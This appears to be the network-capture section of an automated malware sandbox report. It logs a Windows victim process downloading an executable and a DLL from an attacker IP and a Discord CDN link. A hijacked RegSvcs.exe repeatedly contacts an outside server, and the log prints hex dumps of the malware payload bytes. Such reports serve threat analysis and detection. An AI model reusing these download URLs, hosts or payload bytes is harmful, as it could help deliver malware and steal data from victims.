                                                                                        Aug 8, 2022 17:18:44.684010983 CEST684INData Raw: 00 00 0a 28 2a 00 00 06 06 28 4f 00 00 0a 28 23 00 00 0a 6f 52 00 00 0a 7e 1c 00 00 04 28 5f 02 00 06 28 49 02 00 06 6f 4a 00 00 0a 28 22 02 00 06 28 4b 00 00 0a 0b 12 01 28 6a 02 00 06 28 4c 00 00 0a 28 70 02 00 06 28 4e 00 00 0a 28 73 02 00 06
                                                                                        Data Ascii: (*(O(#oR~(_(IoJ("(K(j(L(p(N(s(+(t(((A(Q(*(#oR~(_(IoJ("(K(j(L(p(N(s(+(t((`(-~(u(K~
                                                                                        Aug 8, 2022 17:18:44.684031963 CEST686INData Raw: 00 00 0a 2a 00 00 01 10 00 00 02 00 11 00 9e af 00 0e 00 00 00 00 1b 30 06 00 3f 01 00 00 16 00 00 11 28 47 01 00 06 0a 06 6f 48 00 00 0a 0b 7e 13 00 00 04 16 33 11 1c 07 28 49 00 00 0a 28 24 00 00 06 38 04 01 00 00 7e 13 00 00 04 17 33 2f 28 7f
                                                                                        Data Ascii: *0?(GoH~3(I($8~3/((,(*sd(%(-(.~3e(~(_(IoJ(h(K~(L((M('l(-(.`~3
                                                                                        Aug 8, 2022 17:18:44.684052944 CEST687INData Raw: 00 00 0a 0c 08 11 04 73 87 00 00 0a 0d 09 02 6f 88 00 00 0a 7e 24 00 00 04 05 16 fe 01 5f 39 ae 00 00 00 09 16 6f 89 00 00 0a 28 51 00 00 0a 03 6f 52 00 00 0a 13 07 11 07 73 64 00 00 0a 13 08 73 8a 00 00 0a 13 06 11 06 28 74 02 00 06 6f 8b 00 00
                                                                                        Data Ascii: so~$_9o(QoRsds(to(h(K~(L(p(Noso(h(K~(L(p(Nooo(o+oo_,;o
                                                                                        Aug 8, 2022 17:18:44.684072971 CEST688INData Raw: 07 8e b7 6f 74 00 00 0a 08 11 0c 0e 05 11 0c 6f a8 00 00 0a 28 a9 00 00 0a 13 0a 28 51 00 00 0a 11 0a 6f 52 00 00 0a 13 0b 11 06 11 0b 16 11 0b 8e b7 6f 74 00 00 0a 11 14 6f aa 00 00 0a 2d ae de 16 11 14 75 39 00 00 01 2c 0c 11 14 75 39 00 00 01
                                                                                        Data Ascii: oto((QoRoto-u9,u9o]ot(((QoRotot((((&oRotoeouovswox
                                                                                        Aug 8, 2022 17:18:44.684092045 CEST690INData Raw: 0a 2a 1e 02 13 30 05 00 a8 01 00 00 1e 00 00 11 16 13 14 38 99 01 00 00 00 11 14 1a fe 01 2c 29 12 10 28 af 00 00 0a 28 04 00 00 06 6f b0 00 00 0a 6f b1 00 00 0a 13 11 12 11 28 b2 00 00 0a 73 b3 00 00 0a 13 06 1b 13 14 00 11 14 1d fe 01 2c 0f 28
                                                                                        Data Ascii: *08,)((oo(s,((,s,,(,jo,"((o,2js,(
                                                                                        Aug 8, 2022 17:18:44.684112072 CEST691INData Raw: 01 2c 0c 16 06 8e b7 17 da 13 04 0c 1b 13 05 00 11 05 1c fe 01 2c 1f 08 18 5d 16 fe 01 08 06 8e b7 17 da fe 01 16 fe 01 5f 08 16 fe 02 5f 39 5c ff ff ff 1d 13 05 00 11 05 1b fe 01 2c 08 38 38 ff ff ff 1c 13 05 00 11 05 19 fe 01 2c 09 73 61 00 00
                                                                                        Data Ascii: ,,]__9\,88,sa,,+8oco*z((((}**0#8,{+tso,{+o,{
                                                                                        Aug 8, 2022 17:18:44.684133053 CEST692INData Raw: 14 14 28 98 00 00 0a 28 e2 00 00 0a 28 cc 00 00 0a 3a 6e ff ff ff 07 14 28 d3 02 00 06 16 8d 07 00 00 01 14 14 14 28 98 00 00 0a 28 e3 00 00 0a 0a de 10 25 28 2d 00 00 0a 0d 16 0a 28 2e 00 00 0a de 00 06 2a 00 00 00 41 1c 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: (((:n(((%(-(.*A0['({*(9-{*(:&{*((#(;->so;{*((#o%(-(.,o]{*((#
                                                                                        Aug 8, 2022 17:18:44.712677002 CEST694INData Raw: 0e 11 0e 16 11 09 a2 11 0e 13 0f 11 0f 14 14 17 8d 52 00 00 01 13 10 11 10 16 17 9c 11 10 17 28 9c 00 00 0a 26 11 10 16 90 2c 1f 11 0f 16 9a 28 11 00 00 0a d0 0c 00 00 1b 28 14 00 00 0a 28 a0 00 00 0a 74 0c 00 00 1b 13 09 1f 60 0a 11 09 8e b7 17
                                                                                        Data Ascii: R(&,(((t`/oQ_QcQ((((oR/((Q8V(9


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        2192.168.2.2249176149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        3192.168.2.2249177162.159.133.233443C:\Users\user\AppData\Local\Temp\Client.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        4192.168.2.2249179162.159.135.233443C:\Users\user\AppData\Local\Temp\Client.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        5192.168.2.2249181149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        6192.168.2.2249182149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        7192.168.2.2249183149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        8192.168.2.2249174109.206.241.8180C:\Users\user\AppData\Local\Temp\Client.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Aug 8, 2022 17:18:10.701307058 CEST72OUTGET /htdocs/eZYWw.exe HTTP/1.1
                                                                                        Host: 109.206.241.81
                                                                                        Connection: Keep-Alive
                                                                                        Aug 8, 2022 17:18:10.739402056 CEST73INHTTP/1.1 200 OK
                                                                                        Date: Mon, 08 Aug 2022 15:18:10 GMT
                                                                                        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                                                                                        Last-Modified: Sun, 07 Aug 2022 10:26:43 GMT
                                                                                        ETag: "34400-5e5a422bc1ac2"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 214016
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-msdownload
                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 93 54 de 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3c 03 00 00 06 00 00 00 00 00 00 ce 5b 03 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 5b 03 00 53 00 00 00 00 60 03 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 3b 03 00 00 20 00 00 00 3c 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 02 00 00 00 60 03 00 00 04 00 00 00 3e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 5b 03 00 00 00 00 00 48 00 00 00 02 00 05 00 bc 84 02 00 bc d6 00 00 03 00 00 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 02 00 2c 00 00 00 01 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 01 00 00 04 6f 0a 00 00 0a 2a 13 30 02 00 2c 00 00 00 02 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 02 00 00 04 6f 0b 00 00 0a 2a 13 30 02 00 2c 00 00 00 03 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 03 00 00 04 6f 0c 00 00 0a 2a 13 30 02 00 2c 00 00 00 04 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 04 00 00 04 6f 0d 00 00 0a 2a 13 30 02 00 2e 00 00 00 05 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 02 03 28 11 00 00 0a 28 12 00 00 0a 2a 00 00 13 30 02 00 28 00 00 00 06 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 02 28 13 00 00 0a 2a 13 30 02 00 2c 00 00 00 07 00 00 11 16 0b 2b 1b 00 07 17 fe
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELTb<[ @ @x[S` H.text; < `.rsrc`>@@.relocB@B[H(*(*ssss*0,+,,,++~o*0,+,,,++~o*0,+,,,++~o*0,+,,,++~o*0.+,,,++((*0(+,,,++(*0,+
                                                                                        Aug 8, 2022 17:18:10.739437103 CEST75INData Raw: 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 d0 05 00 00 02 28 14 00 00 0a 2a 13 30 02 00 28 00 00 00 08 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 02
                                                                                        Data Ascii: ,,,++(*0(+,,,++(*0C+;,,-%,(+*,,++*0*(*0O+C,~-2
                                                                                        Aug 8, 2022 17:18:10.739461899 CEST76INData Raw: 61 02 00 06 28 23 00 00 0a 28 38 00 00 0a 26 de 0c 28 2d 00 00 0a 28 2e 00 00 0a de 00 2a 01 10 00 00 00 00 07 00 30 37 00 0c 1d 00 00 01 1b 30 03 00 d1 01 00 00 10 00 00 11 7e 15 00 00 04 39 c6 01 00 00 7e 18 00 00 04 7e 14 00 00 04 16 28 30 00
                                                                                        Data Ascii: a(#(8&(-(.*070~9~~(0;(]("(b(#(9-(]("(b(#(:&~(;,[~(<(=+.o>o?(<(03o@2(-(.
                                                                                        Aug 8, 2022 17:18:10.739485979 CEST78INData Raw: 00 00 0a 28 2a 00 00 06 06 28 4f 00 00 0a 28 23 00 00 0a 6f 52 00 00 0a 7e 1c 00 00 04 28 5f 02 00 06 28 49 02 00 06 6f 4a 00 00 0a 28 22 02 00 06 28 4b 00 00 0a 0b 12 01 28 6a 02 00 06 28 4c 00 00 0a 28 70 02 00 06 28 4e 00 00 0a 28 73 02 00 06
                                                                                        Data Ascii: (*(O(#oR~(_(IoJ("(K(j(L(p(N(s(+(t(((A(Q(*(#oR~(_(IoJ("(K(j(L(p(N(s(+(t((`(-~(u(K~
                                                                                        Aug 8, 2022 17:18:10.739518881 CEST79INData Raw: 00 00 0a 2a 00 00 01 10 00 00 02 00 11 00 9e af 00 0e 00 00 00 00 1b 30 06 00 3f 01 00 00 16 00 00 11 28 47 01 00 06 0a 06 6f 48 00 00 0a 0b 7e 13 00 00 04 16 33 11 1c 07 28 49 00 00 0a 28 24 00 00 06 38 04 01 00 00 7e 13 00 00 04 17 33 2f 28 7f
                                                                                        Data Ascii: *0?(GoH~3(I($8~3/((,(*sd(%(-(.~3e(~(_(IoJ(h(K~(L((M('l(-(.`~3
                                                                                        Aug 8, 2022 17:18:10.739542961 CEST80INData Raw: 00 00 0a 0c 08 11 04 73 87 00 00 0a 0d 09 02 6f 88 00 00 0a 7e 24 00 00 04 05 16 fe 01 5f 39 ae 00 00 00 09 16 6f 89 00 00 0a 28 51 00 00 0a 03 6f 52 00 00 0a 13 07 11 07 73 64 00 00 0a 13 08 73 8a 00 00 0a 13 06 11 06 28 74 02 00 06 6f 8b 00 00
                                                                                        Data Ascii: so~$_9o(QoRsds(to(h(K~(L(p(Noso(h(K~(L(p(Nooo(o+oo_,;o
                                                                                        Aug 8, 2022 17:18:10.739567995 CEST82INData Raw: 07 8e b7 6f 74 00 00 0a 08 11 0c 0e 05 11 0c 6f a8 00 00 0a 28 a9 00 00 0a 13 0a 28 51 00 00 0a 11 0a 6f 52 00 00 0a 13 0b 11 06 11 0b 16 11 0b 8e b7 6f 74 00 00 0a 11 14 6f aa 00 00 0a 2d ae de 16 11 14 75 39 00 00 01 2c 0c 11 14 75 39 00 00 01
                                                                                        Data Ascii: oto((QoRoto-u9,u9o]ot(((QoRotot((((&oRotoeouovswox
                                                                                        Aug 8, 2022 17:18:10.739592075 CEST83INData Raw: 0a 2a 1e 02 13 30 05 00 a8 01 00 00 1e 00 00 11 16 13 14 38 99 01 00 00 00 11 14 1a fe 01 2c 29 12 10 28 af 00 00 0a 28 04 00 00 06 6f b0 00 00 0a 6f b1 00 00 0a 13 11 12 11 28 b2 00 00 0a 73 b3 00 00 0a 13 06 1b 13 14 00 11 14 1d fe 01 2c 0f 28
                                                                                        Data Ascii: *08,)((oo(s,((,s,,(,jo,"((o,2js,(
                                                                                        Aug 8, 2022 17:18:10.739613056 CEST85INData Raw: 01 2c 0c 16 06 8e b7 17 da 13 04 0c 1b 13 05 00 11 05 1c fe 01 2c 1f 08 18 5d 16 fe 01 08 06 8e b7 17 da fe 01 16 fe 01 5f 08 16 fe 02 5f 39 5c ff ff ff 1d 13 05 00 11 05 1b fe 01 2c 08 38 38 ff ff ff 1c 13 05 00 11 05 19 fe 01 2c 09 73 61 00 00
                                                                                        Data Ascii: ,,]__9\,88,sa,,+8oco*z((((}**0#8,{+tso,{+o,{
                                                                                        Aug 8, 2022 17:18:10.739634037 CEST86INData Raw: 14 14 28 98 00 00 0a 28 e2 00 00 0a 28 cc 00 00 0a 3a 6e ff ff ff 07 14 28 d3 02 00 06 16 8d 07 00 00 01 14 14 14 28 98 00 00 0a 28 e3 00 00 0a 0a de 10 25 28 2d 00 00 0a 0d 16 0a 28 2e 00 00 0a de 00 06 2a 00 00 00 41 1c 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: (((:n(((%(-(.*A0['({*(9-{*(:&{*((#(;->so;{*((#o%(-(.,o]{*((#
                                                                                        Aug 8, 2022 17:18:10.768718958 CEST87INData Raw: 0e 11 0e 16 11 09 a2 11 0e 13 0f 11 0f 14 14 17 8d 52 00 00 01 13 10 11 10 16 17 9c 11 10 17 28 9c 00 00 0a 26 11 10 16 90 2c 1f 11 0f 16 9a 28 11 00 00 0a d0 0c 00 00 1b 28 14 00 00 0a 28 a0 00 00 0a 74 0c 00 00 1b 13 09 1f 60 0a 11 09 8e b7 17
                                                                                        Data Ascii: R(&,(((t`/oQ_QcQ((((oR/((Q8V(9


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        9192.168.2.2249178109.206.241.8180C:\Users\user\AppData\Local\Temp\Client.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Aug 8, 2022 17:18:38.760584116 CEST384OUTGET /htdocs/eZYWw.exe HTTP/1.1
                                                                                        Host: 109.206.241.81
                                                                                        Connection: Keep-Alive
                                                                                        Aug 8, 2022 17:18:38.791713953 CEST385INHTTP/1.1 200 OK
                                                                                        Date: Mon, 08 Aug 2022 15:18:38 GMT
                                                                                        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                                                                                        Last-Modified: Sun, 07 Aug 2022 10:26:43 GMT
                                                                                        ETag: "34400-5e5a422bc1ac2"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 214016
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-msdownload
                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 93 54 de 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3c 03 00 00 06 00 00 00 00 00 00 ce 5b 03 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 5b 03 00 53 00 00 00 00 60 03 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 3b 03 00 00 20 00 00 00 3c 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 02 00 00 00 60 03 00 00 04 00 00 00 3e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 5b 03 00 00 00 00 00 48 00 00 00 02 00 05 00 bc 84 02 00 bc d6 00 00 03 00 00 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 02 00 2c 00 00 00 01 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 01 00 00 04 6f 0a 00 00 0a 2a 13 30 02 00 2c 00 00 00 02 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 02 00 00 04 6f 0b 00 00 0a 2a 13 30 02 00 2c 00 00 00 03 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 03 00 00 04 6f 0c 00 00 0a 2a 13 30 02 00 2c 00 00 00 04 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 04 00 00 04 6f 0d 00 00 0a 2a 13 30 02 00 2e 00 00 00 05 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 02 03 28 11 00 00 0a 28 12 00 00 0a 2a 00 00 13 30 02 00 28 00 00 00 06 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 02 28 13 00 00 0a 2a 13 30 02 00 2c 00 00 00 07 00 00 11 16 0b 2b 1b 00 07 17 fe
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELTb<[ @ @x[S` H.text; < `.rsrc`>@@.relocB@B[H(*(*ssss*0,+,,,++~o*0,+,,,++~o*0,+,,,++~o*0,+,,,++~o*0.+,,,++((*0(+,,,++(*0,+
                                                                                        Aug 8, 2022 17:18:38.791793108 CEST387INData Raw: 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 d0 05 00 00 02 28 14 00 00 0a 2a 13 30 02 00 28 00 00 00 08 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 02
                                                                                        Data Ascii: ,,,++(*0(+,,,++(*0C+;,,-%,(+*,,++*0*(*0O+C,~-2
                                                                                        Aug 8, 2022 17:18:38.791857958 CEST388INData Raw: 61 02 00 06 28 23 00 00 0a 28 38 00 00 0a 26 de 0c 28 2d 00 00 0a 28 2e 00 00 0a de 00 2a 01 10 00 00 00 00 07 00 30 37 00 0c 1d 00 00 01 1b 30 03 00 d1 01 00 00 10 00 00 11 7e 15 00 00 04 39 c6 01 00 00 7e 18 00 00 04 7e 14 00 00 04 16 28 30 00
                                                                                        Data Ascii: a(#(8&(-(.*070~9~~(0;(]("(b(#(9-(]("(b(#(:&~(;,[~(<(=+.o>o?(<(03o@2(-(.
                                                                                        Aug 8, 2022 17:18:38.791915894 CEST389INData Raw: 00 00 0a 28 2a 00 00 06 06 28 4f 00 00 0a 28 23 00 00 0a 6f 52 00 00 0a 7e 1c 00 00 04 28 5f 02 00 06 28 49 02 00 06 6f 4a 00 00 0a 28 22 02 00 06 28 4b 00 00 0a 0b 12 01 28 6a 02 00 06 28 4c 00 00 0a 28 70 02 00 06 28 4e 00 00 0a 28 73 02 00 06
                                                                                        Data Ascii: (*(O(#oR~(_(IoJ("(K(j(L(p(N(s(+(t(((A(Q(*(#oR~(_(IoJ("(K(j(L(p(N(s(+(t((`(-~(u(K~
                                                                                        Aug 8, 2022 17:18:38.791975975 CEST391INData Raw: 00 00 0a 2a 00 00 01 10 00 00 02 00 11 00 9e af 00 0e 00 00 00 00 1b 30 06 00 3f 01 00 00 16 00 00 11 28 47 01 00 06 0a 06 6f 48 00 00 0a 0b 7e 13 00 00 04 16 33 11 1c 07 28 49 00 00 0a 28 24 00 00 06 38 04 01 00 00 7e 13 00 00 04 17 33 2f 28 7f
                                                                                        Data Ascii: *0?(GoH~3(I($8~3/((,(*sd(%(-(.~3e(~(_(IoJ(h(K~(L((M('l(-(.`~3
                                                                                        Aug 8, 2022 17:18:38.792037010 CEST392INData Raw: 00 00 0a 0c 08 11 04 73 87 00 00 0a 0d 09 02 6f 88 00 00 0a 7e 24 00 00 04 05 16 fe 01 5f 39 ae 00 00 00 09 16 6f 89 00 00 0a 28 51 00 00 0a 03 6f 52 00 00 0a 13 07 11 07 73 64 00 00 0a 13 08 73 8a 00 00 0a 13 06 11 06 28 74 02 00 06 6f 8b 00 00
                                                                                        Data Ascii: so~$_9o(QoRsds(to(h(K~(L(p(Noso(h(K~(L(p(Nooo(o+oo_,;o
                                                                                        Aug 8, 2022 17:18:38.792093039 CEST394INData Raw: 07 8e b7 6f 74 00 00 0a 08 11 0c 0e 05 11 0c 6f a8 00 00 0a 28 a9 00 00 0a 13 0a 28 51 00 00 0a 11 0a 6f 52 00 00 0a 13 0b 11 06 11 0b 16 11 0b 8e b7 6f 74 00 00 0a 11 14 6f aa 00 00 0a 2d ae de 16 11 14 75 39 00 00 01 2c 0c 11 14 75 39 00 00 01
                                                                                        Data Ascii: oto((QoRoto-u9,u9o]ot(((QoRotot((((&oRotoeouovswox
                                                                                        Aug 8, 2022 17:18:38.792151928 CEST395INData Raw: 0a 2a 1e 02 13 30 05 00 a8 01 00 00 1e 00 00 11 16 13 14 38 99 01 00 00 00 11 14 1a fe 01 2c 29 12 10 28 af 00 00 0a 28 04 00 00 06 6f b0 00 00 0a 6f b1 00 00 0a 13 11 12 11 28 b2 00 00 0a 73 b3 00 00 0a 13 06 1b 13 14 00 11 14 1d fe 01 2c 0f 28
                                                                                        Data Ascii: *08,)((oo(s,((,s,,(,jo,"((o,2js,(
                                                                                        Aug 8, 2022 17:18:38.792210102 CEST396INData Raw: 01 2c 0c 16 06 8e b7 17 da 13 04 0c 1b 13 05 00 11 05 1c fe 01 2c 1f 08 18 5d 16 fe 01 08 06 8e b7 17 da fe 01 16 fe 01 5f 08 16 fe 02 5f 39 5c ff ff ff 1d 13 05 00 11 05 1b fe 01 2c 08 38 38 ff ff ff 1c 13 05 00 11 05 19 fe 01 2c 09 73 61 00 00
                                                                                        Data Ascii: ,,]__9\,88,sa,,+8oco*z((((}**0#8,{+tso,{+o,{
                                                                                        Aug 8, 2022 17:18:38.792268038 CEST398INData Raw: 14 14 28 98 00 00 0a 28 e2 00 00 0a 28 cc 00 00 0a 3a 6e ff ff ff 07 14 28 d3 02 00 06 16 8d 07 00 00 01 14 14 14 28 98 00 00 0a 28 e3 00 00 0a 0a de 10 25 28 2d 00 00 0a 0d 16 0a 28 2e 00 00 0a de 00 06 2a 00 00 00 41 1c 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: (((:n(((%(-(.*A0['({*(9-{*(:&{*((#(;->so;{*((#o%(-(.,o]{*((#
                                                                                        Aug 8, 2022 17:18:38.820405960 CEST399INData Raw: 0e 11 0e 16 11 09 a2 11 0e 13 0f 11 0f 14 14 17 8d 52 00 00 01 13 10 11 10 16 17 9c 11 10 17 28 9c 00 00 0a 26 11 10 16 90 2c 1f 11 0f 16 9a 28 11 00 00 0a d0 0c 00 00 1b 28 14 00 00 0a 28 a0 00 00 0a 74 0c 00 00 1b 13 09 1f 60 0a 11 09 8e b7 17
                                                                                        Data Ascii: R(&,(((t`/oQ_QcQ((((oR/((Q8V(9


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        0192.168.2.2249173162.159.134.233443C:\Users\user\AppData\Local\Temp\Client.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        2022-08-08 15:18:10 UTC0OUTGET /attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dll HTTP/1.1
                                                                                        Host: cdn.discordapp.com
                                                                                        Connection: Keep-Alive
                                                                                        2022-08-08 15:18:10 UTC0INHTTP/1.1 200 OK
                                                                                        Date: Mon, 08 Aug 2022 15:18:10 GMT
                                                                                        Content-Type: application/x-msdos-program
                                                                                        Content-Length: 59904
                                                                                        Connection: close
                                                                                        CF-Ray: 7379391bfe7d6969-FRA
                                                                                        Accept-Ranges: bytes
                                                                                        Age: 110633
                                                                                        Cache-Control: public, max-age=31536000
                                                                                        Content-Disposition: attachment;%20filename=RealProxyFlagsBadSignature.dll, attachment
                                                                                        ETag: "79242a4038e35f2234d3373fb9133c3b"
                                                                                        Expires: Tue, 08 Aug 2023 15:18:10 GMT
                                                                                        Last-Modified: Sun, 07 Aug 2022 05:12:50 GMT
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: HIT
                                                                                        Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
